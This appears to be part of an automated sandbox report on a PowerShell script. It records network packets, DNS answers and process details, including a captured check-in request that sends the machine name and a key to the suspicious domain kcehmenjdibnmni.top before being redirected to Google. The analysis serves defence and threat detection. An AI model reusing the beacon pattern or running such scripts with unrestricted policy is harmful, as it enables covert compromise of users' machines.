                                                                                                          Jan 5, 2025 16:25:01.006102085 CET4973080192.168.2.445.61.136.138
                                                                                                          Jan 5, 2025 16:25:01.011215925 CET804973045.61.136.138192.168.2.4
                                                                                                          Jan 5, 2025 16:25:01.634792089 CET804973045.61.136.138192.168.2.4
                                                                                                          Jan 5, 2025 16:25:01.645634890 CET4973180192.168.2.4142.250.185.68
                                                                                                          Jan 5, 2025 16:25:01.650440931 CET8049731142.250.185.68192.168.2.4
                                                                                                          Jan 5, 2025 16:25:01.650506020 CET4973180192.168.2.4142.250.185.68
                                                                                                          Jan 5, 2025 16:25:01.650650024 CET4973180192.168.2.4142.250.185.68
                                                                                                          Jan 5, 2025 16:25:01.655401945 CET8049731142.250.185.68192.168.2.4
                                                                                                          Jan 5, 2025 16:25:01.681401014 CET4973080192.168.2.445.61.136.138
                                                                                                          Jan 5, 2025 16:25:02.342988014 CET8049731142.250.185.68192.168.2.4
                                                                                                          Jan 5, 2025 16:25:02.343019009 CET8049731142.250.185.68192.168.2.4
                                                                                                          Jan 5, 2025 16:25:02.343029022 CET8049731142.250.185.68192.168.2.4
                                                                                                          Jan 5, 2025 16:25:02.343074083 CET8049731142.250.185.68192.168.2.4
                                                                                                          Jan 5, 2025 16:25:02.343075991 CET4973180192.168.2.4142.250.185.68
                                                                                                          Jan 5, 2025 16:25:02.343086004 CET8049731142.250.185.68192.168.2.4
                                                                                                          Jan 5, 2025 16:25:02.343113899 CET4973180192.168.2.4142.250.185.68
                                                                                                          Jan 5, 2025 16:25:02.343302965 CET8049731142.250.185.68192.168.2.4
                                                                                                          Jan 5, 2025 16:25:02.343319893 CET8049731142.250.185.68192.168.2.4
                                                                                                          Jan 5, 2025 16:25:02.343331099 CET8049731142.250.185.68192.168.2.4
                                                                                                          Jan 5, 2025 16:25:02.343339920 CET4973180192.168.2.4142.250.185.68
                                                                                                          Jan 5, 2025 16:25:02.343369961 CET4973180192.168.2.4142.250.185.68
                                                                                                          Jan 5, 2025 16:25:02.343470097 CET8049731142.250.185.68192.168.2.4
                                                                                                          Jan 5, 2025 16:25:02.343482971 CET8049731142.250.185.68192.168.2.4
                                                                                                          Jan 5, 2025 16:25:02.343521118 CET4973180192.168.2.4142.250.185.68
                                                                                                          Jan 5, 2025 16:25:02.347954988 CET8049731142.250.185.68192.168.2.4
                                                                                                          Jan 5, 2025 16:25:02.347991943 CET8049731142.250.185.68192.168.2.4
                                                                                                          Jan 5, 2025 16:25:02.348002911 CET8049731142.250.185.68192.168.2.4
                                                                                                          Jan 5, 2025 16:25:02.348057985 CET4973180192.168.2.4142.250.185.68
                                                                                                          Jan 5, 2025 16:25:02.433526039 CET8049731142.250.185.68192.168.2.4
                                                                                                          Jan 5, 2025 16:25:02.433629036 CET8049731142.250.185.68192.168.2.4
                                                                                                          Jan 5, 2025 16:25:02.433640003 CET8049731142.250.185.68192.168.2.4
                                                                                                          Jan 5, 2025 16:25:02.433660984 CET4973180192.168.2.4142.250.185.68
                                                                                                          Jan 5, 2025 16:25:02.433794975 CET8049731142.250.185.68192.168.2.4
                                                                                                          Jan 5, 2025 16:25:02.433806896 CET8049731142.250.185.68192.168.2.4
                                                                                                          Jan 5, 2025 16:25:02.433815956 CET8049731142.250.185.68192.168.2.4
                                                                                                          Jan 5, 2025 16:25:02.433834076 CET4973180192.168.2.4142.250.185.68
                                                                                                          Jan 5, 2025 16:25:02.433855057 CET4973180192.168.2.4142.250.185.68
                                                                                                          Jan 5, 2025 16:25:02.438801050 CET8049731142.250.185.68192.168.2.4
                                                                                                          Jan 5, 2025 16:25:02.438859940 CET8049731142.250.185.68192.168.2.4
                                                                                                          Jan 5, 2025 16:25:02.438870907 CET8049731142.250.185.68192.168.2.4
                                                                                                          Jan 5, 2025 16:25:02.438910007 CET4973180192.168.2.4142.250.185.68
                                                                                                          Jan 5, 2025 16:25:02.445128918 CET8049731142.250.185.68192.168.2.4
                                                                                                          Jan 5, 2025 16:25:02.445147038 CET8049731142.250.185.68192.168.2.4
                                                                                                          Jan 5, 2025 16:25:02.445158958 CET8049731142.250.185.68192.168.2.4
                                                                                                          Jan 5, 2025 16:25:02.445183039 CET4973180192.168.2.4142.250.185.68
                                                                                                          Jan 5, 2025 16:25:02.445195913 CET4973180192.168.2.4142.250.185.68
                                                                                                          Jan 5, 2025 16:25:02.451519966 CET8049731142.250.185.68192.168.2.4
                                                                                                          Jan 5, 2025 16:25:02.451530933 CET8049731142.250.185.68192.168.2.4
                                                                                                          Jan 5, 2025 16:25:02.451540947 CET8049731142.250.185.68192.168.2.4
                                                                                                          Jan 5, 2025 16:25:02.451567888 CET4973180192.168.2.4142.250.185.68
                                                                                                          Jan 5, 2025 16:25:02.457700014 CET8049731142.250.185.68192.168.2.4
                                                                                                          Jan 5, 2025 16:25:02.457748890 CET8049731142.250.185.68192.168.2.4
                                                                                                          Jan 5, 2025 16:25:02.457761049 CET8049731142.250.185.68192.168.2.4
                                                                                                          Jan 5, 2025 16:25:02.457792997 CET4973180192.168.2.4142.250.185.68
                                                                                                          Jan 5, 2025 16:25:02.457815886 CET4973180192.168.2.4142.250.185.68
                                                                                                          Jan 5, 2025 16:25:02.463867903 CET8049731142.250.185.68192.168.2.4
                                                                                                          Jan 5, 2025 16:25:02.463908911 CET8049731142.250.185.68192.168.2.4
                                                                                                          Jan 5, 2025 16:25:02.463958979 CET4973180192.168.2.4142.250.185.68
                                                                                                          Jan 5, 2025 16:25:02.463984013 CET8049731142.250.185.68192.168.2.4
                                                                                                          Jan 5, 2025 16:25:02.464034081 CET8049731142.250.185.68192.168.2.4
                                                                                                          Jan 5, 2025 16:25:02.464075089 CET4973180192.168.2.4142.250.185.68
                                                                                                          Jan 5, 2025 16:25:02.470215082 CET8049731142.250.185.68192.168.2.4
                                                                                                          Jan 5, 2025 16:25:02.470273972 CET8049731142.250.185.68192.168.2.4
                                                                                                          Jan 5, 2025 16:25:02.470283985 CET8049731142.250.185.68192.168.2.4
                                                                                                          Jan 5, 2025 16:25:02.470314026 CET4973180192.168.2.4142.250.185.68
                                                                                                          Jan 5, 2025 16:25:02.476552010 CET8049731142.250.185.68192.168.2.4
                                                                                                          Jan 5, 2025 16:25:02.476597071 CET8049731142.250.185.68192.168.2.4
                                                                                                          Jan 5, 2025 16:25:02.476607084 CET8049731142.250.185.68192.168.2.4
                                                                                                          Jan 5, 2025 16:25:02.476636887 CET4973180192.168.2.4142.250.185.68
                                                                                                          Jan 5, 2025 16:25:02.476663113 CET4973180192.168.2.4142.250.185.68
                                                                                                          Jan 5, 2025 16:25:02.482711077 CET8049731142.250.185.68192.168.2.4
                                                                                                          Jan 5, 2025 16:25:02.482724905 CET8049731142.250.185.68192.168.2.4
                                                                                                          Jan 5, 2025 16:25:02.482768059 CET4973180192.168.2.4142.250.185.68
                                                                                                          Jan 5, 2025 16:25:02.482858896 CET8049731142.250.185.68192.168.2.4
                                                                                                          Jan 5, 2025 16:25:02.482868910 CET8049731142.250.185.68192.168.2.4
                                                                                                          Jan 5, 2025 16:25:02.482902050 CET4973180192.168.2.4142.250.185.68
                                                                                                          Jan 5, 2025 16:25:02.524110079 CET8049731142.250.185.68192.168.2.4
                                                                                                          Jan 5, 2025 16:25:02.524127007 CET8049731142.250.185.68192.168.2.4
                                                                                                          Jan 5, 2025 16:25:02.524173975 CET8049731142.250.185.68192.168.2.4
                                                                                                          Jan 5, 2025 16:25:02.524192095 CET4973180192.168.2.4142.250.185.68
                                                                                                          Jan 5, 2025 16:25:02.524327040 CET8049731142.250.185.68192.168.2.4
                                                                                                          Jan 5, 2025 16:25:02.524338961 CET8049731142.250.185.68192.168.2.4
                                                                                                          Jan 5, 2025 16:25:02.524377108 CET4973180192.168.2.4142.250.185.68
                                                                                                          Jan 5, 2025 16:25:02.524386883 CET8049731142.250.185.68192.168.2.4
                                                                                                          Jan 5, 2025 16:25:02.524429083 CET4973180192.168.2.4142.250.185.68
                                                                                                          Jan 5, 2025 16:25:02.525095940 CET8049731142.250.185.68192.168.2.4
                                                                                                          Jan 5, 2025 16:25:02.525110960 CET8049731142.250.185.68192.168.2.4
                                                                                                          Jan 5, 2025 16:25:02.525151014 CET4973180192.168.2.4142.250.185.68
                                                                                                          Jan 5, 2025 16:25:02.525242090 CET8049731142.250.185.68192.168.2.4
                                                                                                          Jan 5, 2025 16:25:02.525252104 CET8049731142.250.185.68192.168.2.4
                                                                                                          Jan 5, 2025 16:25:02.525291920 CET4973180192.168.2.4142.250.185.68
                                                                                                          Jan 5, 2025 16:25:02.531527042 CET8049731142.250.185.68192.168.2.4
                                                                                                          Jan 5, 2025 16:25:02.531604052 CET8049731142.250.185.68192.168.2.4
                                                                                                          Jan 5, 2025 16:25:02.531614065 CET8049731142.250.185.68192.168.2.4
                                                                                                          Jan 5, 2025 16:25:02.531655073 CET4973180192.168.2.4142.250.185.68
                                                                                                          Jan 5, 2025 16:25:02.537786961 CET8049731142.250.185.68192.168.2.4
                                                                                                          Jan 5, 2025 16:25:02.537842989 CET8049731142.250.185.68192.168.2.4
                                                                                                          Jan 5, 2025 16:25:02.537853003 CET8049731142.250.185.68192.168.2.4
                                                                                                          Jan 5, 2025 16:25:02.537895918 CET4973180192.168.2.4142.250.185.68
                                                                                                          Jan 5, 2025 16:25:02.537914991 CET4973180192.168.2.4142.250.185.68
                                                                                                          Jan 5, 2025 16:25:02.548340082 CET8049731142.250.185.68192.168.2.4
                                                                                                          Jan 5, 2025 16:25:02.548351049 CET8049731142.250.185.68192.168.2.4
                                                                                                          Jan 5, 2025 16:25:02.548419952 CET4973180192.168.2.4142.250.185.68
                                                                                                          Jan 5, 2025 16:25:02.769705057 CET4973180192.168.2.4142.250.185.68
                                                                                                          Jan 5, 2025 16:25:02.772423029 CET4973080192.168.2.445.61.136.138

                                                                                                          UDP Packets

                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Jan 5, 2025 16:25:00.403801918 CET5945453192.168.2.41.1.1.1
                                                                                                          Jan 5, 2025 16:25:00.954212904 CET53594541.1.1.1192.168.2.4
                                                                                                          Jan 5, 2025 16:25:01.636334896 CET5711753192.168.2.41.1.1.1
                                                                                                          Jan 5, 2025 16:25:01.643141031 CET53571171.1.1.1192.168.2.4

                                                                                                          DNS Queries

                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                          Jan 5, 2025 16:25:00.403801918 CET192.168.2.41.1.1.10xcd7aStandard query (0)kcehmenjdibnmni.topA (IP address)IN (0x0001)false
                                                                                                          Jan 5, 2025 16:25:01.636334896 CET192.168.2.41.1.1.10x45f7Standard query (0)www.google.comA (IP address)IN (0x0001)false

                                                                                                          DNS Answers

                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                          Jan 5, 2025 16:25:00.954212904 CET1.1.1.1192.168.2.40xcd7aNo error (0)kcehmenjdibnmni.top45.61.136.138A (IP address)IN (0x0001)false
                                                                                                          Jan 5, 2025 16:25:01.643141031 CET1.1.1.1192.168.2.40x45f7No error (0)www.google.com142.250.185.68A (IP address)IN (0x0001)false

                                                                                                          HTTP Request Dependency Graph

                                                                                                          • kcehmenjdibnmni.top
                                                                                                          • www.google.com

                                                                                                          HTTP Packets

                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          0192.168.2.44973045.61.136.138807572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 5, 2025 16:25:01.006102085 CET215OUTGET /g6n2wfvsr0htr.php?id=user-PC&key=95416299579&s=527 HTTP/1.1
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                          Host: kcehmenjdibnmni.top
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 5, 2025 16:25:01.634792089 CET166INHTTP/1.1 302 Found
                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                          Date: Sun, 05 Jan 2025 15:25:01 GMT
                                                                                                          Content-Length: 0
                                                                                                          Connection: keep-alive
                                                                                                          Location: http://www.google.com


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          1192.168.2.449731142.250.185.68807572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 5, 2025 16:25:01.650650024 CET159OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                          Host: www.google.com
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 5, 2025 16:25:02.342988014 CET1236INHTTP/1.1 200 OK
                                                                                                          Date: Sun, 05 Jan 2025 15:25:02 GMT
                                                                                                          Expires: -1
                                                                                                          Cache-Control: private, max-age=0
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-yaNCczj9r_UV-cif63DLTA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                                          P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                          Server: gws
                                                                                                          X-XSS-Protection: 0
                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                          Set-Cookie: AEC=AZ6Zc-VM0RujuXku1z2GbcdCuqfIXsTBRW0bsokjBD9kOgJgFOsVcLXou0c; expires=Fri, 04-Jul-2025 15:25:02 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                                                          Set-Cookie: NID=520=WaoWwmvhdntohZ9-xeEROt0aDFvShgR3TeY85Zay70A5cfHu_BBUjyUz7znj8fgZkddZfkcPCQMf7cfKZC0kVdLRMmCx2EXNiD349ONv5o7vVFr_Q9zbGjYtXWuFu-x-oY6NvSW9s5K_wi7lSIluccijqrQdh3MScqcaO2Fz_7nvxIhcXgf8ckYh46Xyx3MB8YUIQyCAbw; expires=Mon, 07-Jul-2025 15:25:02 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                          Accept-Ranges: none
                                                                                                          Vary: Accept-Encoding
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Data Raw: 34 37 64 33 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 53 65 61 72 63 68 20 74 68 65 20 77 6f 72 6c 64 27 73 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2c 20 69 6e 63 6c 75 64 69 6e 67 20 77 65 62 70 61 67 65 73 2c 20 69 6d 61 67 65 73
                                                                                                          Data Ascii: 47d3<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta content="Search the world's information, including webpages, images
                                                                                                          Jan 5, 2025 16:25:02.343019009 CET224INData Raw: 2c 20 76 69 64 65 6f 73 20 61 6e 64 20 6d 6f 72 65 2e 20 47 6f 6f 67 6c 65 20 68 61 73 20 6d 61 6e 79 20 73 70 65 63 69 61 6c 20 66 65 61 74 75 72 65 73 20 74 6f 20 68 65 6c 70 20 79 6f 75 20 66 69 6e 64 20 65 78 61 63 74 6c 79 20 77 68 61 74 20
                                                                                                          Data Ascii: , videos and more. Google has many special features to help you find exactly what you're looking for." name="description"><meta content="noodp, " name="robots"><meta content="text/html; charset=UTF-8" http-equiv="Content-Typ
                                                                                                          Jan 5, 2025 16:25:02.343029022 CET1236INData Raw: 65 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 67 2f 31 78 2f 67 6f 6f 67 6c 65 67 5f 73 74 61 6e 64 61 72 64 5f 63 6f 6c 6f 72 5f 31 32 38 64 70 2e 70 6e 67 22 20 69 74
                                                                                                          Data Ascii: e"><meta content="/images/branding/googleg/1x/googleg_standard_color_128dp.png" itemprop="image"><title>Google</title><script nonce="yaNCczj9r_UV-cif63DLTA">(function(){var _g={kEI:'TqR6Z4-vDKODxc8PrbW3wQ0',kEXPI:'0,793108,2907205,1071,538661,
                                                                                                          Jan 5, 2025 16:25:02.343074083 CET1236INData Raw: 31 32 2c 31 31 38 2c 36 33 39 2c 32 2c 37 2c 32 35 33 2c 31 37 30 2c 38 31 2c 33 32 2c 31 31 30 2c 34 36 35 2c 32 2c 37 2c 31 2c 31 32 37 2c 37 30 34 2c 39 33 2c 33 36 33 2c 35 34 2c 31 2c 34 33 37 2c 33 34 30 2c 39 35 33 2c 31 36 32 32 2c 32 33
                                                                                                          Data Ascii: 12,118,639,2,7,253,170,81,32,110,465,2,7,1,127,704,93,363,54,1,437,340,953,1622,233,102,193,1,1206,464,2,6,186,352,105,16,204,1,1614,2095,691,21347206,37198,18,3482,868,3488,1749,48,155,372,181,1664,110,8,2065,3,1207,52,540,17,5986025,2038088,
                                                                                                          Jan 5, 2025 16:25:02.343086004 CET1236INData Raw: 3d 70 3b 67 6f 6f 67 6c 65 2e 6d 6c 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 3b 67 6f 6f 67 6c 65 2e 6c 6f 67 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 64 2c 63 2c 68 2c 65 29 7b 65 3d 65 3d 3d 3d 76 6f 69 64 20 30
                                                                                                          Data Ascii: =p;google.ml=function(){return null};google.log=function(a,b,d,c,h,e){e=e===void 0?k:e;d||(d=r(a,b,e,c,h));if(d=q(d)){a=new Image;var f=m.length;m[f]=a;a.onerror=a.onload=a.onabort=function(){delete m[f]};a.src=d}};google.logUrl=function(a,b){
                                                                                                          Jan 5, 2025 16:25:02.343302965 CET672INData Raw: 29 7b 76 61 72 20 61 3b 61 3a 7b 66 6f 72 28 61 3d 62 2e 74 61 72 67 65 74 3b 61 26 26 61 21 3d 3d 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 3b 61 3d 61 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 29 69 66 28 61 2e 74
                                                                                                          Data Ascii: ){var a;a:{for(a=b.target;a&&a!==document.documentElement;a=a.parentElement)if(a.tagName==="A"){a=a.getAttribute("data-nohref")==="1";break a}a=!1}a&&b.preventDefault()},!0);}).call(this);</script><style>#gb{font:13px/27px Arial,sans-serif;hei
                                                                                                          Jan 5, 2025 16:25:02.343319893 CET1236INData Raw: 64 20 23 30 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 34 70 78 3b 68 65 69 67 68 74 3a 32 39 70 78 3b 5f 68 65 69 67 68 74 3a 33 30 70 78 3b 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 74 65 72 3a 61 6c 70 68 61 28 6f 70 61 63 69 74 79 3d 31 30 30 29
                                                                                                          Data Ascii: d #000;font-size:24px;height:29px;_height:30px;opacity:1;filter:alpha(opacity=100);position:absolute;top:0;width:100%;z-index:990}#gbx3{left:0}#gbx4{right:0}#gbb{position:relative}#gbbw{left:0;position:absolute;top:30px;width:100%}.gbtcb{posit
                                                                                                          Jan 5, 2025 16:25:02.343331099 CET1116INData Raw: 20 64 61 73 68 65 64 20 64 61 73 68 65 64 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 62 6f 72 64 65 72 2d 74 6f 70 2d 63 6f 6c 6f 72 3a 23 63 30 63 30 63 30 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 69 6e 6c 69
                                                                                                          Data Ascii: dashed dashed;border-color:transparent;border-top-color:#c0c0c0;display:-moz-inline-box;display:inline-block;font-size:0;height:0;line-height:0;width:0;border-width:3px 3px 0;padding-top:1px;left:4px}#gbztms1,#gbi4m1,#gbi4s,#gbi4t{zoom:1}.gbt
                                                                                                          Jan 5, 2025 16:25:02.343470097 CET1236INData Raw: 74 3a 39 70 78 7d 23 67 62 7a 20 2e 67 62 7a 74 2c 23 67 62 7a 20 2e 67 62 67 74 2c 23 67 62 67 20 2e 67 62 67 74 7b 63 6f 6c 6f 72 3a 23 63 63 63 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 67 62 74 62 32 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 62
                                                                                                          Data Ascii: t:9px}#gbz .gbzt,#gbz .gbgt,#gbg .gbgt{color:#ccc!important}.gbtb2{display:block;border-top:2px solid transparent}.gbto .gbzt .gbtb2,.gbto .gbgt .gbtb2{border-top-width:0}.gbtb .gbts{background:url(https://ssl.gstatic.com/gb/images/b_8d5afc09.
                                                                                                          Jan 5, 2025 16:25:02.343482971 CET1236INData Raw: 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 34 38 70 78 3b 77 69 64 74 68 3a 34 38 70 78 7d 23 67 62 6d 70 69 77 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 39 70 78 3b 70 61 64 64 69 6e
                                                                                                          Data Ascii: e-block;height:48px;width:48px}#gbmpiw{display:inline-block;line-height:9px;padding-left:20px;margin-top:10px;position:relative}#gbmpi,#gbmpid,#gbmpiw{*display:inline}#gbg5{font-size:0}#gbgs5{padding:5px !important}.gbto #gbgs5{padding:7px 5px
                                                                                                          Jan 5, 2025 16:25:02.347954988 CET1236INData Raw: 6d 6c 62 77 7b 63 6f 6c 6f 72 3a 23 63 63 63 3b 6d 61 72 67 69 6e 3a 30 20 31 30 70 78 7d 2e 67 62 6d 74 7b 70 61 64 64 69 6e 67 3a 30 20 32 30 70 78 7d 2e 67 62 6d 74 3a 68 6f 76 65 72 2c 2e 67 62 6d 74 3a 66 6f 63 75 73 7b 62 61 63 6b 67 72 6f
                                                                                                          Data Ascii: mlbw{color:#ccc;margin:0 10px}.gbmt{padding:0 20px}.gbmt:hover,.gbmt:focus{background:#eee;cursor:pointer;outline:0 solid black;text-decoration:none !important}.gbm0l,.gbm0l:visited{color:#000 !important;font-weight:bold}.gbmh{border-top:1px s


                                                                                                          Statistics

                                                                                                          CPU Usage

                                                                                                          Click to jump to process

                                                                                                          Memory Usage

                                                                                                          Click to jump to process

                                                                                                          High Level Behavior Distribution

                                                                                                          Click to dive into process behavior distribution

                                                                                                          Behavior

                                                                                                          Click to jump to process

                                                                                                          System Behavior

                                                                                                          General

                                                                                                          Target ID:0
                                                                                                          Start time:10:24:55
                                                                                                          Start date:05/01/2025
                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
                                                                                                          Imagebase:0x7ff788560000
                                                                                                          File size:452'608 bytes
                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          General

                                                                                                          Target ID:1
                                                                                                          Start time:10:24:55
                                                                                                          Start date:05/01/2025
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                          File size:862'208 bytes
                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          Disassembly

                                                                                                          Reset < >

                                                                                                            Executed Functions

                                                                                                            Function 00007FFD9B7F7EE6 Relevance: .5, Instructions: 472COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1867777957.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7ffd9b7e0000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 71b13c49b0ea47e6019fd0d04c8aac0f3851391e6e444f57d17e73b002c03924
                                                                                                            • Instruction ID: ccadc5f43cb3cf0e9db79e81368dc1e7786d1f77001844f7ade1304225534d35
                                                                                                            • Opcode Fuzzy Hash: 71b13c49b0ea47e6019fd0d04c8aac0f3851391e6e444f57d17e73b002c03924
                                                                                                            • Instruction Fuzzy Hash: D5F1B530A09A8D8FEBA8DF28C8557E97BD1FF54310F44436EE85DC72A5DB34A9418B81
                                                                                                            Function 00007FFD9B7F8C92 Relevance: .5, Instructions: 460COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1867777957.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7ffd9b7e0000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0bc1fda32199917eb25d76baf7aa43e864dd7d6c62e27f23f4a0a6789b343193
                                                                                                            • Instruction ID: 833332a8aacffab1830dad094bb86c0f3e37aff8691273bc0a275275b26a98a9
                                                                                                            • Opcode Fuzzy Hash: 0bc1fda32199917eb25d76baf7aa43e864dd7d6c62e27f23f4a0a6789b343193
                                                                                                            • Instruction Fuzzy Hash: D6E1B430B09A4D8FEBA8DF28C8557E97BD1EF54310F14436AE84DC72A5DE74A9418BC1
                                                                                                            Function 00007FFD9BA53EC9 Relevance: 2.9, Strings: 2, Instructions: 431COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1873717521.00007FFD9BA50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA50000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7ffd9ba50000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: @7DY$H7DY
                                                                                                            • API String ID: 0-3778096330
                                                                                                            • Opcode ID: f00ab98bc8731083cc29d5c4ac989262c0fdf056fd0d3484f10b1f45bb5b3303
                                                                                                            • Instruction ID: 7ba0548cff918734eea456afede97ccfd1ac5105206f642d09caa24a95f83e20
                                                                                                            • Opcode Fuzzy Hash: f00ab98bc8731083cc29d5c4ac989262c0fdf056fd0d3484f10b1f45bb5b3303
                                                                                                            • Instruction Fuzzy Hash: 95C14A32B0EA8D0FE7A5DBAC48656787BD1EFA5210B1901BFD04DC71B7DE65AE058340
                                                                                                            Function 00007FFD9B7F23C2 Relevance: 1.5, Strings: 1, Instructions: 226COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1867777957.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7ffd9b7e0000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: M_^
                                                                                                            • API String ID: 0-1220826073
                                                                                                            • Opcode ID: c2314119d32a6505372c7eaa59e7bb4e1f8cf5f4b6ed85b7ad8277b1a13bf2b0
                                                                                                            • Instruction ID: d2178b77ae3bc637ae1a7a176436e6e29a5266b5710f1c69da86d5870b992253
                                                                                                            • Opcode Fuzzy Hash: c2314119d32a6505372c7eaa59e7bb4e1f8cf5f4b6ed85b7ad8277b1a13bf2b0
                                                                                                            • Instruction Fuzzy Hash: DF614662A0EBC94FD71697AC68661E87FE0EF12320F0942EFE099C71E3C954681583C7
                                                                                                            Function 00007FFD9BAA1B65 Relevance: .7, Instructions: 727COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1874612661.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7ffd9baa0000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e014a7142027bffc0fb7dce02750f549e6e1384af1000ee264a6a3b9df32389a
                                                                                                            • Instruction ID: 7f387bdf9629a6830a10b11c2cc5be0cb42850e3afc4fd7bcaa4101ee3a2c080
                                                                                                            • Opcode Fuzzy Hash: e014a7142027bffc0fb7dce02750f549e6e1384af1000ee264a6a3b9df32389a
